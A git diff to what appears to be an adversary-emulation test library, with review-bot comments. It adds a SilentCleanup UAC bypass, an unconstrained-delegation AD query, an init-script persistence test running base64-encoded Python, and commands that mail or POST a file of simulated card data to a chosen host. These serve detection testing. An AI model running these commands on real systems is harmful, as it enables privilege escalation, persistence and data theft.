diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index e84bab59..0e530577 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -118,6 +118,7 @@ privilege-escalation,T1548.002,Bypass User Account Control,5,Bypass UAC using Co
privilege-escalation,T1548.002,Bypass User Account Control,6,Bypass UAC by Mocking Trusted Directories,f7a35090-6f7f-4f64-bb47-d657bf5b10c1,command_prompt
privilege-escalation,T1548.002,Bypass User Account Control,7,Bypass UAC using sdclt DelegateExecute,3be891eb-4608-4173-87e8-78b494c029b7,powershell
privilege-escalation,T1548.002,Bypass User Account Control,8,Disable UAC using reg.exe,9e8af564-53ec-407e-aaa8-3cb20c3af7f9,command_prompt
+privilege-escalation,T1548.002,Bypass User Account Control,9,Bypass UAC using SilentCleanup task,28104f8a-4ff1-4582-bcf6-699dce156608,command_prompt
privilege-escalation,T1574.012,COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell
privilege-escalation,T1574.012,COR_PROFILER,2,System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell
privilege-escalation,T1574.012,COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell
@@ -215,6 +216,7 @@ defense-evasion,T1548.002,Bypass User Account Control,5,Bypass UAC using Compute
defense-evasion,T1548.002,Bypass User Account Control,6,Bypass UAC by Mocking Trusted Directories,f7a35090-6f7f-4f64-bb47-d657bf5b10c1,command_prompt
defense-evasion,T1548.002,Bypass User Account Control,7,Bypass UAC using sdclt DelegateExecute,3be891eb-4608-4173-87e8-78b494c029b7,powershell
defense-evasion,T1548.002,Bypass User Account Control,8,Disable UAC using reg.exe,9e8af564-53ec-407e-aaa8-3cb20c3af7f9,command_prompt
+defense-evasion,T1548.002,Bypass User Account Control,9,Bypass UAC using SilentCleanup task,28104f8a-4ff1-4582-bcf6-699dce156608,command_prompt
defense-evasion,T1218.003,CMSTP,1,CMSTP Executing Remote Scriptlet,34e63321-9683-496b-bbc1-7566bc55e624,command_prompt
defense-evasion,T1218.003,CMSTP,2,CMSTP Executing UAC Bypass,748cb4f6-2fb3-4e97-b7ad-b22635a09ab0,command_prompt
defense-evasion,T1574.012,COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell
@@ -618,6 +620,7 @@ discovery,T1087.002,Domain Account,6,Adfind - Enumerate Active Directory Admins,
discovery,T1087.002,Domain Account,7,Adfind - Enumerate Active Directory User Objects,e1ec8d20-509a-4b9a-b820-06c9b2da8eb7,command_prompt
discovery,T1087.002,Domain Account,8,Adfind - Enumerate Active Directory Exchange AD Objects,5e2938fb-f919-47b6-8b29-2f6a1f718e99,command_prompt
discovery,T1087.002,Domain Account,9,Enumerate Default Domain Admin Details (Domain),c70ab9fd-19e2-4e02-a83c-9cfa8eaa8fef,command_prompt
+discovery,T1087.002,Domain Account,10,Enumerate Active Directory for Unconstrained Delegation,46f8dbe9-22a5-4770-8513-66119c5be63b,powershell
discovery,T1069.002,Domain Groups,1,Basic Permission Groups Discovery Windows (Domain),dd66d77d-8998-48c0-8024-df263dc2ce5d,command_prompt
discovery,T1069.002,Domain Groups,2,Permission Groups Discovery PowerShell (Domain),6d5d8c96-3d2a-4da9-9d6d-9a9d341899a7,powershell
discovery,T1069.002,Domain Groups,3,Elevated group enumeration using net group (Domain),0afb5163-8181-432e-9405-4322710c0c37,command_prompt
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index e3a45879..5d54166f 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -85,6 +85,7 @@ privilege-escalation,T1548.002,Bypass User Account Control,5,Bypass UAC using Co
privilege-escalation,T1548.002,Bypass User Account Control,6,Bypass UAC by Mocking Trusted Directories,f7a35090-6f7f-4f64-bb47-d657bf5b10c1,command_prompt
privilege-escalation,T1548.002,Bypass User Account Control,7,Bypass UAC using sdclt DelegateExecute,3be891eb-4608-4173-87e8-78b494c029b7,powershell
privilege-escalation,T1548.002,Bypass User Account Control,8,Disable UAC using reg.exe,9e8af564-53ec-407e-aaa8-3cb20c3af7f9,command_prompt
+privilege-escalation,T1548.002,Bypass User Account Control,9,Bypass UAC using SilentCleanup task,28104f8a-4ff1-4582-bcf6-699dce156608,command_prompt
privilege-escalation,T1574.012,COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell
privilege-escalation,T1574.012,COR_PROFILER,2,System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell
privilege-escalation,T1574.012,COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell
@@ -151,6 +152,7 @@ defense-evasion,T1548.002,Bypass User Account Control,5,Bypass UAC using Compute
defense-evasion,T1548.002,Bypass User Account Control,6,Bypass UAC by Mocking Trusted Directories,f7a35090-6f7f-4f64-bb47-d657bf5b10c1,command_prompt
defense-evasion,T1548.002,Bypass User Account Control,7,Bypass UAC using sdclt DelegateExecute,3be891eb-4608-4173-87e8-78b494c029b7,powershell
defense-evasion,T1548.002,Bypass User Account Control,8,Disable UAC using reg.exe,9e8af564-53ec-407e-aaa8-3cb20c3af7f9,command_prompt
+defense-evasion,T1548.002,Bypass User Account Control,9,Bypass UAC using SilentCleanup task,28104f8a-4ff1-4582-bcf6-699dce156608,command_prompt
defense-evasion,T1218.003,CMSTP,1,CMSTP Executing Remote Scriptlet,34e63321-9683-496b-bbc1-7566bc55e624,command_prompt
defense-evasion,T1218.003,CMSTP,2,CMSTP Executing UAC Bypass,748cb4f6-2fb3-4e97-b7ad-b22635a09ab0,command_prompt
defense-evasion,T1574.012,COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell
@@ -436,6 +438,7 @@ discovery,T1087.002,Domain Account,6,Adfind - Enumerate Active Directory Admins,
discovery,T1087.002,Domain Account,7,Adfind - Enumerate Active Directory User Objects,e1ec8d20-509a-4b9a-b820-06c9b2da8eb7,command_prompt
discovery,T1087.002,Domain Account,8,Adfind - Enumerate Active Directory Exchange AD Objects,5e2938fb-f919-47b6-8b29-2f6a1f718e99,command_prompt
discovery,T1087.002,Domain Account,9,Enumerate Default Domain Admin Details (Domain),c70ab9fd-19e2-4e02-a83c-9cfa8eaa8fef,command_prompt
+discovery,T1087.002,Domain Account,10,Enumerate Active Directory for Unconstrained Delegation,46f8dbe9-22a5-4770-8513-66119c5be63b,powershell
discovery,T1069.002,Domain Groups,1,Basic Permission Groups Discovery Windows (Domain),dd66d77d-8998-48c0-8024-df263dc2ce5d,command_prompt
discovery,T1069.002,Domain Groups,2,Permission Groups Discovery PowerShell (Domain),6d5d8c96-3d2a-4da9-9d6d-9a9d341899a7,powershell
discovery,T1069.002,Domain Groups,3,Elevated group enumeration using net group (Domain),0afb5163-8181-432e-9405-4322710c0c37,command_prompt
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index 3a916e39..a9ae5a7c 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -227,6 +227,7 @@
- Atomic Test #6: Bypass UAC by Mocking Trusted Directories [windows]
- Atomic Test #7: Bypass UAC using sdclt DelegateExecute [windows]
- Atomic Test #8: Disable UAC using reg.exe [windows]
+ - Atomic Test #9: Bypass UAC using SilentCleanup task [windows]
- [T1574.012 COR_PROFILER](../../T1574.012/T1574.012.md)
- Atomic Test #1: User scope COR_PROFILER [windows]
- Atomic Test #2: System Scope COR_PROFILER [windows]
@@ -417,6 +418,7 @@
- Atomic Test #6: Bypass UAC by Mocking Trusted Directories [windows]
- Atomic Test #7: Bypass UAC using sdclt DelegateExecute [windows]
- Atomic Test #8: Disable UAC using reg.exe [windows]
+ - Atomic Test #9: Bypass UAC using SilentCleanup task [windows]
- [T1218.003 CMSTP](../../T1218.003/T1218.003.md)
- Atomic Test #1: CMSTP Executing Remote Scriptlet [windows]
- Atomic Test #2: CMSTP Executing UAC Bypass [windows]
@@ -1119,6 +1121,7 @@
- Atomic Test #7: Adfind - Enumerate Active Directory User Objects [windows]
- Atomic Test #8: Adfind - Enumerate Active Directory Exchange AD Objects [windows]
- Atomic Test #9: Enumerate Default Domain Admin Details (Domain) [windows]
+ - Atomic Test #10: Enumerate Active Directory for Unconstrained Delegation [windows]
- [T1069.002 Domain Groups](../../T1069.002/T1069.002.md)
- Atomic Test #1: Basic Permission Groups Discovery Windows (Domain) [windows]
- Atomic Test #2: Permission Groups Discovery PowerShell (Domain) [windows]
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index 6433b60d..5b6382dc 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -178,6 +178,7 @@
- Atomic Test #6: Bypass UAC by Mocking Trusted Directories [windows]
- Atomic Test #7: Bypass UAC using sdclt DelegateExecute [windows]
- Atomic Test #8: Disable UAC using reg.exe [windows]
+ - Atomic Test #9: Bypass UAC using SilentCleanup task [windows]
- [T1574.012 COR_PROFILER](../../T1574.012/T1574.012.md)
- Atomic Test #1: User scope COR_PROFILER [windows]
- Atomic Test #2: System Scope COR_PROFILER [windows]
@@ -308,6 +309,7 @@
- Atomic Test #6: Bypass UAC by Mocking Trusted Directories [windows]
- Atomic Test #7: Bypass UAC using sdclt DelegateExecute [windows]
- Atomic Test #8: Disable UAC using reg.exe [windows]
+ - Atomic Test #9: Bypass UAC using SilentCleanup task [windows]
- [T1218.003 CMSTP](../../T1218.003/T1218.003.md)
- Atomic Test #1: CMSTP Executing Remote Scriptlet [windows]
- Atomic Test #2: CMSTP Executing UAC Bypass [windows]
@@ -818,6 +820,7 @@
- Atomic Test #7: Adfind - Enumerate Active Directory User Objects [windows]
- Atomic Test #8: Adfind - Enumerate Active Directory Exchange AD Objects [windows]
- Atomic Test #9: Enumerate Default Domain Admin Details (Domain) [windows]
+ - Atomic Test #10: Enumerate Active Directory for Unconstrained Delegation [windows]
- [T1069.002 Domain Groups](../../T1069.002/T1069.002.md)
- Atomic Test #1: Basic Permission Groups Discovery Windows (Domain) [windows]
- Atomic Test #2: Permission Groups Discovery PowerShell (Domain) [windows]
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index af7d14dd..69c30c6a 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -10120,6 +10120,31 @@ privilege-escalation:
'
name: command_prompt
elevation_required: true
+ - name: Bypass UAC using SilentCleanup task
+ auto_generated_guid: 28104f8a-4ff1-4582-bcf6-699dce156608
+ description: |
+ Bypass UAC using SilentCleanup task on Windows 8-10 using bat file from https://www.reddit.com/r/hacking/comments/ajtrws/bypassing_highest_uac_level_windows_810/
+
+ There is an auto-elevated task called SilentCleanup located in %windir%\system32\cleanmgr.exe This can be abused to elevate any file with Administrator privileges without prompting UAC (even highest level).
+
+ For example, we can set the windir registry kye to: "cmd /k REM "
+
+ And forcefully run SilentCleanup task:
+
+ schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I
+
+ REM will tell it to ignore everything after %windir% and treat it just as a NOTE. Therefore just executing cmd with admin privs.
+ supported_platforms:
+ - windows
+ input_arguments:
+ file_path:
+ description: Path to the bat file
+ type: String
+ default: PathToAtomicsFolder\T1548.002\src\T1548.002.bat
+ executor:
+ command: "#{file_path}\n"
+ name: command_prompt
+ elevation_required: false
T1574.012:
technique:
external_references:
@@ -19315,6 +19340,31 @@ defense-evasion:
'
name: command_prompt
elevation_required: true
+ - name: Bypass UAC using SilentCleanup task
+ auto_generated_guid: 28104f8a-4ff1-4582-bcf6-699dce156608
+ description: |
+ Bypass UAC using SilentCleanup task on Windows 8-10 using bat file from https://www.reddit.com/r/hacking/comments/ajtrws/bypassing_highest_uac_level_windows_810/
+
+ There is an auto-elevated task called SilentCleanup located in %windir%\system32\cleanmgr.exe This can be abused to elevate any file with Administrator privileges without prompting UAC (even highest level).
+
+ For example, we can set the windir registry kye to: "cmd /k REM "
+
+ And forcefully run SilentCleanup task:
+
+ schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I
+
+ REM will tell it to ignore everything after %windir% and treat it just as a NOTE. Therefore just executing cmd with admin privs.
+ supported_platforms:
+ - windows
+ input_arguments:
+ file_path:
+ description: Path to the bat file
+ type: String
+ default: PathToAtomicsFolder\T1548.002\src\T1548.002.bat
+ executor:
+ command: "#{file_path}\n"
+ name: command_prompt
+ elevation_required: false
T1218.003:
technique:
external_references:
@@ -28887,11 +28937,9 @@ defense-evasion:
description: SMTP Server IP Address
type: string
default: 127.0.0.1
- dependency_executor_name: powershell
executor:
- command: '"Send-MailMessage -From #{sender} -To #{receiver} -Subject "T1027
- Atomic Test" -Attachments PathToAtomicsFolder\T1027\src\T1027-cc-macro.xlsm
- -SmtpServer #{smtp_server}"
+ command: 'Send-MailMessage -From #{sender} -To #{receiver} -Subject ''T1027_Atomic_Test''
+ -Attachments #{input_file} -SmtpServer #{smtp_server}
'
name: powershell
@@ -28911,9 +28959,8 @@ defense-evasion:
description: Destination IP address
type: string
default: 127.0.0.1
- dependency_executor_name: powershell
executor:
- command: 'Invoke-WebRequest -Uri #{ip_address} -Method POST -Body PathToAtomicsFolder\T1027\src\T1027-cc-macro.xlsm
+ command: 'Invoke-WebRequest -Uri #{ip_address} -Method POST -Body #{input_file}
'
name: powershell
@@ -49382,6 +49429,49 @@ discovery:
'
name: command_prompt
+ - name: Enumerate Active Directory for Unconstrained Delegation
+ auto_generated_guid: 46f8dbe9-22a5-4770-8513-66119c5be63b
+ description: |
+ Attackers may attempt to query for computer objects with the UserAccountControl property
+ 'TRUSTED_FOR_DELEGATION' (0x80000;524288) set
+ More Information - https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html#when-the-stars-align-unconstrained-delegation-leads-to-rce
+ Prerequisite: AD RSAT PowerShell module is needed and it must run under a domain user
+ supported_platforms:
+ - windows
+ input_arguments:
+ domain:
+ description: Domain FQDN
+ type: String
+ default: contoso.com
+ uac_prop:
+ description: UAC Property to search
+ type: String
+ default: 524288
+ dependencies:
+ - description: 'PowerShell ActiveDirectory Module must be installed
+
+'
+ prereq_command: |
+ Try {
+ Import-Module ActiveDirectory -ErrorAction Stop | Out-Null
+ exit 0
+ }
+ Catch {
+ exit 1
+ }
+ get_prereq_command: |
+ if((Get-CimInstance -ClassName Win32_OperatingSystem).ProductType -eq 1) {
+ Add-WindowsCapability -Name (Get-WindowsCapability -Name RSAT.ActiveDirectory.DS* -Online).Name -Online
+ } else {
+ Install-WindowsFeature RSAT-AD-PowerShell
+ }
+ executor:
+ name: powershell
+ elevation_required: false
+ command: 'Get-ADObject -LDAPFilter ''(UserAccountControl:1.2.840.113556.1.4.803:=#{uac_prop})''
+ -Server #{domain}
+
+'
T1069.002:
technique:
external_references:
diff --git a/atomics/T1027/T1027.md b/atomics/T1027/T1027.md
index 74a09cdb..9f34ff74 100644
--- a/atomics/T1027/T1027.md
+++ b/atomics/T1027/T1027.md
@@ -203,7 +203,7 @@ Sensitive data includes about around 20 odd simulated credit card numbers that p
```powershell
-"Send-MailMessage -From #{sender} -To #{receiver} -Subject "T1027 Atomic Test" -Attachments PathToAtomicsFolder\T1027\src\T1027-cc-macro.xlsm -SmtpServer #{smtp_server}"
+Send-MailMessage -From #{sender} -To #{receiver} -Subject 'T1027_Atomic_Test' -Attachments #{input_file} -SmtpServer #{smtp_server}
```
@@ -234,7 +234,7 @@ Sensitive data includes about around 20 odd simulated credit card numbers that p
```powershell
-Invoke-WebRequest -Uri #{ip_address} -Method POST -Body PathToAtomicsFolder\T1027\src\T1027-cc-macro.xlsm
+Invoke-WebRequest -Uri #{ip_address} -Method POST -Body #{input_file}
```
diff --git a/atomics/T1027/T1027.yaml b/atomics/T1027/T1027.yaml
index 4288d3ae..7210e5af 100644
--- a/atomics/T1027/T1027.yaml
+++ b/atomics/T1027/T1027.yaml
@@ -109,7 +109,7 @@ atomic_tests:
supported_platforms:
- windows
input_arguments:
- input_file:
+ input_file:
description: Path of the XLSM file
type: path
default: PathToAtomicsFolder\T1027\src\T1027-cc-macro.xlsm
@@ -125,10 +125,9 @@ atomic_tests:
description: SMTP Server IP Address
type: string
default: 127.0.0.1
- dependency_executor_name: powershell
executor:
command: |
- "Send-MailMessage -From #{sender} -To #{receiver} -Subject "T1027 Atomic Test" -Attachments PathToAtomicsFolder\T1027\src\T1027-cc-macro.xlsm -SmtpServer #{smtp_server}"
+ Send-MailMessage -From #{sender} -To #{receiver} -Subject 'T1027_Atomic_Test' -Attachments #{input_file} -SmtpServer #{smtp_server}
name: powershell
- name: DLP Evasion via Sensitive Data in VBA Macro over HTTP
@@ -147,8 +146,7 @@ atomic_tests:
description: Destination IP address
type: string
default: 127.0.0.1
- dependency_executor_name: powershell
executor:
command: |
- Invoke-WebRequest -Uri #{ip_address} -Method POST -Body PathToAtomicsFolder\T1027\src\T1027-cc-macro.xlsm
+ Invoke-WebRequest -Uri #{ip_address} -Method POST -Body #{input_file}
name: powershell
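Review bot: In the HTTP variant, the new `-Body #{input_file}` on the Invoke-WebRequest line still sends the path text as the POST body rather than the contents of the XLSM, so a DLP or proxy rule keyed on the macro file content is never exercised even though the test is named for exactly that. The mail variant earlier in this section does attach the file via `-Attachments`, so the two tests are not equivalent. Either switch the upload to `-InFile #{input_file}` or make the description say that only the file path is posted. The `dependency_executor_name` removal is fine only if these tests have no `dependencies` block, which lies outside the hunk.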
diff --git a/atomics/T1087.002/T1087.002.md b/atomics/T1087.002/T1087.002.md
index 2b80197a..f39060c1 100644
--- a/atomics/T1087.002/T1087.002.md
+++ b/atomics/T1087.002/T1087.002.md
@@ -24,6 +24,8 @@ Commands such as net user /domain and net group /domain
@@ -344,4 +346,59 @@ net user administrator /domain
+
+
+
+## Atomic Test #10 - Enumerate Active Directory for Unconstrained Delegation
+Attackers may attempt to query for computer objects with the UserAccountControl property
+'TRUSTED_FOR_DELEGATION' (0x80000;524288) set
+More Information - https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html#when-the-stars-align-unconstrained-delegation-leads-to-rce
+Prerequisite: AD RSAT PowerShell module is needed and it must run under a domain user
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| domain | Domain FQDN | String | contoso.com|
+| uac_prop | UAC Property to search | String | 524288|
+
+
+#### Attack Commands: Run with `powershell`!
+
+
+```powershell
+Get-ADObject -LDAPFilter '(UserAccountControl:1.2.840.113556.1.4.803:=#{uac_prop})' -Server #{domain}
+```
+
+
+
+
+#### Dependencies: Run with `powershell`!
+##### Description: PowerShell ActiveDirectory Module must be installed
+##### Check Prereq Commands:
+```powershell
+Try {
+ Import-Module ActiveDirectory -ErrorAction Stop | Out-Null
+ exit 0
+}
+Catch {
+ exit 1
+}
+```
+##### Get Prereq Commands:
+```powershell
+if((Get-CimInstance -ClassName Win32_OperatingSystem).ProductType -eq 1) {
+ Add-WindowsCapability -Name (Get-WindowsCapability -Name RSAT.ActiveDirectory.DS* -Online).Name -Online
+} else {
+ Install-WindowsFeature RSAT-AD-PowerShell
+}
+```
+
+
+
+
diff --git a/atomics/T1087.002/T1087.002.yaml b/atomics/T1087.002/T1087.002.yaml
index d8f3a3f4..61822ffb 100644
--- a/atomics/T1087.002/T1087.002.yaml
+++ b/atomics/T1087.002/T1087.002.yaml
@@ -69,7 +69,7 @@ atomic_tests:
name: powershell
- name: Adfind -Listing password policy
auto_generated_guid: 736b4f53-f400-4c22-855d-1a6b5a551600
- description: |
+ description: |
Adfind tool can be used for reconnaissance in an Active directory environment. The example chosen illustrates adfind used to query the local password policy.
reference- http://www.joeware.net/freetools/tools/adfind/, https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx
supported_platforms:
@@ -93,7 +93,7 @@ atomic_tests:
name: command_prompt
- name: Adfind - Enumerate Active Directory Admins
auto_generated_guid: b95fd967-4e62-4109-b48d-265edfd28c3a
- description: |
+ description: |
Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Admin accounts
reference- http://www.joeware.net/freetools/tools/adfind/, https://stealthbits.com/blog/fun-with-active-directorys-admincount-attribute/
supported_platforms:
@@ -117,7 +117,7 @@ atomic_tests:
name: command_prompt
- name: Adfind - Enumerate Active Directory User Objects
auto_generated_guid: e1ec8d20-509a-4b9a-b820-06c9b2da8eb7
- description: |
+ description: |
Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory User Objects
reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html
supported_platforms:
@@ -141,7 +141,7 @@ atomic_tests:
name: command_prompt
- name: Adfind - Enumerate Active Directory Exchange AD Objects
auto_generated_guid: 5e2938fb-f919-47b6-8b29-2f6a1f718e99
- description: |
+ description: |
Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Exchange Objects
reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html
supported_platforms:
@@ -173,3 +173,44 @@ atomic_tests:
command: |
net user administrator /domain
name: command_prompt
+
+- name: Enumerate Active Directory for Unconstrained Delegation
+ auto_generated_guid: 46f8dbe9-22a5-4770-8513-66119c5be63b
+ description: |
+ Attackers may attempt to query for computer objects with the UserAccountControl property
+ 'TRUSTED_FOR_DELEGATION' (0x80000;524288) set
+ More Information - https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html#when-the-stars-align-unconstrained-delegation-leads-to-rce
+ Prerequisite: AD RSAT PowerShell module is needed and it must run under a domain user
+ supported_platforms:
+ - windows
+ input_arguments:
+ domain:
+ description: Domain FQDN
+ type: String
+ default: contoso.com
+ uac_prop:
+ description: UAC Property to search
+ type: String
+ default: 524288
+ dependencies:
+ - description: |
+ PowerShell ActiveDirectory Module must be installed
+ prereq_command: |
+ Try {
+ Import-Module ActiveDirectory -ErrorAction Stop | Out-Null
+ exit 0
+ }
+ Catch {
+ exit 1
+ }
+ get_prereq_command: |
+ if((Get-CimInstance -ClassName Win32_OperatingSystem).ProductType -eq 1) {
+ Add-WindowsCapability -Name (Get-WindowsCapability -Name RSAT.ActiveDirectory.DS* -Online).Name -Online
+ } else {
+ Install-WindowsFeature RSAT-AD-PowerShell
+ }
+ executor:
+ name: powershell
+ elevation_required: false
+ command: |
+ Get-ADObject -LDAPFilter '(UserAccountControl:1.2.840.113556.1.4.803:=#{uac_prop})' -Server #{domain}
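Review bot: The description of the new test says it queries computer objects, but `Get-ADObject` with the `1.2.840.113556.1.4.803` bit filter on `UserAccountControl` returns every object class carrying that bit, so user accounts trusted for delegation come back as well, and domain controllers carry the flag by default, so the result is never empty in a functioning domain. Suggest the description read `Query AD objects (computers and users) whose UserAccountControl has TRUSTED_FOR_DELEGATION set; domain controllers always match, so filter them out when reviewing results`, or narrow the command to `Get-ADComputer -LDAPFilter ...` if computers are really the target. The stated prerequisite that the test must run under a domain user is not verified by `prereq_command`, which only imports the module; a guard such as `if (-not $env:USERDNSDOMAIN) { exit 1 }` ahead of the import would make the check match the description. The earlier hunks in this file are whitespace-only.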
diff --git a/atomics/T1543.002/T1543.002.md b/atomics/T1543.002/T1543.002.md
index c9bfec54..6f2f4e4b 100644
--- a/atomics/T1543.002/T1543.002.md
+++ b/atomics/T1543.002/T1543.002.md
@@ -16,6 +16,8 @@ While adversaries typically require root privileges to create/modify service uni
- [Atomic Test #1 - Create Systemd Service](#atomic-test-1---create-systemd-service)
+- [Atomic Test #2 - Create Systemd Service unit file, Enable the service , Modify and Reload the service.](#atomic-test-2---create-systemd-service-unit-file--enable-the-service--modify-and-reload-the-service)
+
@@ -75,4 +77,67 @@ systemctl daemon-reload
+
+
+
+## Atomic Test #2 - Create Systemd Service unit file, Enable the service , Modify and Reload the service.
+This test creates a systemd service unit file and enables it to autostart on boot. Once service is created and enabled, it also modifies this same service file showcasing both Creation and Modification of system process.
+
+**Supported Platforms:** Linux
+
+
+
+
+
+#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin)
+
+
+```bash
+cat > /etc/init.d/T1543.002 << EOF
+#!/bin/bash
+### BEGIN INIT INFO
+# Provides : Atomic Test T1543.002
+# Required-Start: $all
+# Required-Stop :
+# Default-Start: 2 3 4 5
+# Default-Stop:
+# Short Description: Atomic Test for Systemd Service Creation
+### END INIT INFO
+python3 -c "import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBDcmVhdGluZyBTeXN0ZW1kIFNlcnZpY2UgVDE1NDMuMDAyID4gL3RtcC9UMTU0My4wMDIuc3lzdGVtZC5zZXJ2aWNlLmNyZWF0aW9uJykK'))"
+EOF
+
+chmod +x /etc/init.d/T1543.002
+if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat /etc/os-release | grep -i ID=kali) ]; then update-rc.d T1543.002 defaults; elif [ $(cat /etc/os-release | grep -i 'ID="centos"') ]; then chkconfig T1543.002 on ; else echo "Please run this test on Ubnutu , kali OR centos" ; fi ;
+systemctl enable T1543.002
+systemctl start T1543.002
+
+echo "python3 -c \"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgYSBTeXN0ZW1kIFNlcnZpY2UgVDE1NDMuMDAyID4gL3RtcC9UMTU0My4wMDIuc3lzdGVtZC5zZXJ2aWNlLm1vZGlmaWNhdGlvbicpCg=='))\"" | sudo tee -a /etc/init.d/T1543.002
+systemctl daemon-reload
+systemctl restart T1543.002
+```
+
+#### Cleanup Commands:
+```bash
+systemctl stop T1543.002
+systemctl disable T1543.002
+rm -rf /etc/init.d/T1543.002
+systemctl daemon-reload
+```
+
+
+
+#### Dependencies: Run with `bash`!
+##### Description: System must be Ubuntu ,Kali OR CentOS.
+##### Check Prereq Commands:
+```bash
+if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat /etc/os-release | grep -i ID=kali) ] || [ $(cat /etc/os-release | grep -i 'ID="centos"') ]; then exit /b 0; else exit /b 1; fi;
+```
+##### Get Prereq Commands:
+```bash
+echo Please run these atomic tests from Ubuntu ,Kali OR CentOS.
+```
+
+
+
+
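Review bot: The prereq check at the end of this section uses `exit /b 0` and `exit /b 1`, which is cmd.exe syntax; under bash `exit /b` is an error (a non-numeric or extra argument), so the check never returns 0 and the dependency is reported unmet on every platform. The intended line is `if grep -qi 'ID=ubuntu' /etc/os-release || grep -qi 'ID=kali' /etc/os-release || grep -qi 'ID="centos"' /etc/os-release; then exit 0; else exit 1; fi`, and the same `[ $(cat ... | grep ...) ]` pattern in the attack commands would be safer as `grep -q` too. The base64 payloads appear to decode to Python that writes marker files under `/tmp/T1543.002.systemd.service.*`, which the cleanup block does not remove, and the artefact created is a SysV script under `/etc/init.d` rather than a systemd unit, so detections watching `/etc/systemd/system` are not exercised despite the test title. This markdown is presumably generated from `T1543.002.yaml`, which is not in this diff, so the fixes belong there.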
diff --git a/atomics/T1548.002/T1548.002.md b/atomics/T1548.002/T1548.002.md
index 98064122..597dc756 100644
--- a/atomics/T1548.002/T1548.002.md
+++ b/atomics/T1548.002/T1548.002.md
@@ -28,6 +28,8 @@ Another bypass is possible through some lateral movement techniques if credentia
- [Atomic Test #8 - Disable UAC using reg.exe](#atomic-test-8---disable-uac-using-regexe)
+- [Atomic Test #9 - Bypass UAC using SilentCleanup task](#atomic-test-9---bypass-uac-using-silentcleanup-task)
+
@@ -314,4 +316,43 @@ reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v En
+
+
+
+## Atomic Test #9 - Bypass UAC using SilentCleanup task
+Bypass UAC using SilentCleanup task on Windows 8-10 using bat file from https://www.reddit.com/r/hacking/comments/ajtrws/bypassing_highest_uac_level_windows_810/
+
+There is an auto-elevated task called SilentCleanup located in %windir%\system32\cleanmgr.exe This can be abused to elevate any file with Administrator privileges without prompting UAC (even highest level).
+
+For example, we can set the windir registry kye to: "cmd /k REM "
+
+And forcefully run SilentCleanup task:
+
+schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I
+
+REM will tell it to ignore everything after %windir% and treat it just as a NOTE. Therefore just executing cmd with admin privs.
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| file_path | Path to the bat file | String | PathToAtomicsFolder\T1548.002\src\T1548.002.bat|
+
+
+#### Attack Commands: Run with `command_prompt`!
+
+
+```cmd
+#{file_path}
+```
+
+
+
+
+
+
diff --git a/atomics/T1548.002/T1548.002.yaml b/atomics/T1548.002/T1548.002.yaml
index 5186a236..619b5f6a 100644
--- a/atomics/T1548.002/T1548.002.yaml
+++ b/atomics/T1548.002/T1548.002.yaml
@@ -162,3 +162,29 @@ atomic_tests:
